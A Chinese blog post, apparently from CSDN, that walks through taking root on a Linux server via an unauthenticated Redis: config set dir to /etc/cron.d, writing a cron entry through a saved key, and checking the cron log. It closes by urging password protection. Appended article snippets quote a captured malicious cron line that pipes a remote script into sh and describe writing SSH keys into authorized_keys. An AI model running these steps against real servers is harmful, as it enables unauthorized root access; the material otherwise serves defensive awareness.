linux 连接redis_借redis之手入侵服务器

最新推荐文章于 2024-05-06 16:03:17 发布
最新推荐文章于 2024-05-06 16:03:17 发布
阅读量189 收藏
点赞数
文章标签: linux 连接redis linux连接redis redis 设置密码 redis密码设置 redis设置密码 设置redis密码
本文演示了通过Redis端口暴露公网且未设密码的情况,攻击者如何轻易获取Linux服务器root权限的过程。通过修改Redis配置,设置计划任务执行恶意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

30c447e7fbdda6dcc996700899fde41c.png

说明

利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。

原理

远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。

入侵演示

#### 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可

bind 0.0.0.0  #允许所有ip连接
protected-mode no  # 关闭保护模式
daemonize yes #后台运行
# redis安装后默认配置是免密码的

#### 2. 启动redis

# 这里是root直接启动,入侵后就得到了root权限
/usr/local/redis/bin/redis-server redis.conf

#### 3. 入侵 ##### 3.0 连接redis 使用redis-cli工具直接连接redis

redis-cli -h jiankongshuo.com -p 6379

##### 3.1 清空redis所有数据 

flushall

##### 3.2 修改redis 数据目录 这里设置为计划任务子目录 config set dir "/etc/cron.d/" ##### 3.3 修改dbfilename

config set dbfilename imin

##### 3.4 设置键值并保存

set test "n*/1 * * * * root echo 'HaHa,I am in!'>/root/redisn"
save

##### 3.5 验证是否写入计划任务文件

cat /etc/cron.d/imin
REDIS0009   redis-ver5.0.7
redis-bits  escused-mem 
 preamble~ st3
*/1 * * * * root echo 'HaHa,I am in!'>/root/redis

乱码及上面的redis信息不用管,计划任务会执行 ##### 3.6 验证计划任务是否执行

tail -1f /var/log/cron 
Mar  7 11:34:01 jiankongshuo CROND[10348]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:35:01 jiankongshuo CROND[10352]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:36:01 jiankongshuo CROND[10354]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)
Mar  7 11:37:01 jiankongshuo CROND[10356]: (root) CMD (echo 'HaHa,I am in!'>/root/redis)

##### 3.7 验证计划命令结果 cat /root/redis HaHa,I am in! 至此,redis入侵演示完毕。 环境说明 1. 操作系统 CentOS8 2. redis 编译参数 make install PREFIX=/usr/local/redis 3. redis版本Redis server v=5.0.7

特殊说明 使用yum安装的redis (也是root启动)不会有这个问题,文件一直被限制在/var/lib/redis 下面。 而自己编译安装进行攻击,目前我还不清楚yum安装的是否有其他编译参数限制了redis的数据目录,从而更加安全。 最后,请大家务必关闭redis的外网访问,切一定要设置redis强密码。

参考 优快云-专业IT技术社区-登录

如果你觉得本文对你有所帮助,欢迎关注!

http://weixin.qq.com/r/TS8KEqPE2-6kredx93pf (二维码自动识别)

https://jq.qq.com/?_wv=1027&k=5PMd7Ct (二维码自动识别)

linux中配置redis密码
码农研究僧的博客
12-14 9470
目录前言1. 临时密码2. 永久密码3. 验证 前言 如果在服务器中搭建了redis设置密码的话,可能会被入侵导致你的cpu瞬间飙高 那么最好设置一下密码 1. 临时密码 由于我配置了后台的登录模式 所以直接后台启动了 之后获取文件中的requirepass,查询其value的值 给予一个密码,也就是一个value root@gaokaoli:/opt/redis-6.2.1# redis-server /etc/redis.conf root@gaokaoli:/opt/redis-6.2.1# re
linux安装redis
weixin_35815479的博客
12-06 1039
前言 linux版本 centos7.5 1.下载 官网 Redis 我的百度网盘地址 安装步骤 1、下载获得redis-6.2.6.tar.gz后将它放到我们Linux的目录下 /opt 2、/opt 目录下,解压命令 tar -zxvf redis-6.2.6.tar.gz 3、解压完成后出现文件夹 redis-6.2.6 4、进入目录: cd redis-6.2.6 5、在 redis-6.2.6目录下执行 make 运行ma...
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6427
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
redis被黑客入侵
程序员陆通
02-12 1536
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
利用redis入侵服务器
weixin_43641575的博客
01-17 795
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。 一,生成本地ssh公钥 ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面 二,先连接redis看看 telnet 10.10.10.102 6379...
redis入侵服务器
运维724
03-07 458
说明 利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。 原理 远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。 入侵演示 1. 编译安装并配置 redis密码,允许外部连接。主要修改以下参数,其他参数默认即可 bind 0.0.0.0 #允...
linux redis入侵,Redis 攻击还原Linux提权入侵的相关说明
weixin_33925615的博客
05-14 152
Spring学习笔记之初始化和销毁方法的调用次序Multiple lifecycle mechanisms configured for the same bean, with different initialization methods, a ...cdoj 排名表 拓扑排序 排名输出 贪心//并不理解为什么需要反向建图,由大到小倒序确定排名.感觉正向由小到大和反向由大到小应该是一样的. 解...
Redis_Crackit漏洞介绍
幸福诗歌的博客
01-28 1509
2015年11月10日,有网络安全厂商指出国内互联网产生了大量针对Redis数据库服务器的扫描流量,其中有不少Redis服务器的数据库被清空,且/root/.ssh/authorized_keys文件被创建或改写,入侵者可以获取受影响服务器的完全控制权限。因为受影响的Redis服务器的数据库被清空,但留存有一条键名为crackit的记录,因此这次事件被命名为Redis Crackit入侵事件。 ...
redis进阶--IDEA环境
最新发布
m0_69468924的博客
05-06 2117
redis进阶--IDEA环境
记一次愚蠢的Redis配置导致Linux服务器被恶意攻击
u012708900的博客
12-23 921
起因 之前Linux服务器上面一直启的Redis单机,并设置密码。也没出现过问题。对安全这方面也不太敏感。 前天重新搭建了Redis集群(一主两从三哨兵),都只是做了最简单的配置,期初master配置中是有密码的,但是在配置slave时,没有添加masterauth配置项(因为无知,- -!),导致主从复制一直失败,索性就把master中的requirepass给注释掉了。再次重启主从复制成功了,哨兵的配置也成功启动,发现模拟故障转移也莫得问题,就认为万事大吉了。 经过 然而昨天中午的时候,收到了阿里云的
利用Redis配置漏洞黑进linux服务器(被黑过一次,特出此警告贴)
weixin_43783160的博客
11-24 539
参考博客: http://www.zhoulingjie.com/archives/1140 漏洞描述 1、借助 redis 内置命令,可以对现有数据进行恶意清空 2、 如果 redis 以root身份运行,可往服务器上写入SSH公钥文件,直接登录服务器 漏洞原理 如果redis端口对外网开放,且未配置安全密码访问(或泄露); 当 redis 以root用户身份运行时,就可以借助链接到redis,通过redis内置命令修改 dir和 dbfilename 从而可往服务器的任何位置写入任何内容的文件,当
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2287
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 1012
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
记录一次redis入侵事件(无重大影响)
大锅霍皮久的博客
04-08 7751
早上看到阿里云报警,提示”Linux系统计划任务配置文件写入行为“,虽然这个reids集群做在内网,可能因为做了本地端口转发,所以导致了入侵事件。1.现象于是上服务器,crontab -l 看到有一个定时任务写在计划任务中2.分析将这个脚本下载下来进行分析,wget https://transfer.sh/Yfso3/tmp.YmboB7ymVN脚本内容如下sleep 1 find . -maxd...
python如何入侵服务器的_通过redis入侵服务器的步骤
weixin_42524276的博客
01-12 616
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。一,生成本地ssh公钥ssh-keygen二,先连接redis看看telnet 192.168.15.10 6379redis-cli -h 192.168.15.10三, 清一下re...
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5398
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
谨防利用Redis未授权访问漏洞入侵服务器
weixin_42100387的博客
11-24 2022
谨防利用Redis未授权访问漏洞入侵服务器
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1722
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
记一次Redis漏洞导致服务器入侵以及解决的过程
orisonchan的博客
08-09 2742
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
linux中的redis设置密码
10-27
1. 进入Redis,如果没有开启Redis则需要先开启。 2. 查看当前Redis有没有设置密码。 3. 如果没有设置密码,则可以通过config set requirepass命令来设置密码。 4. 再次查看当前Redis,此时会提示需要密码。 需要注意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值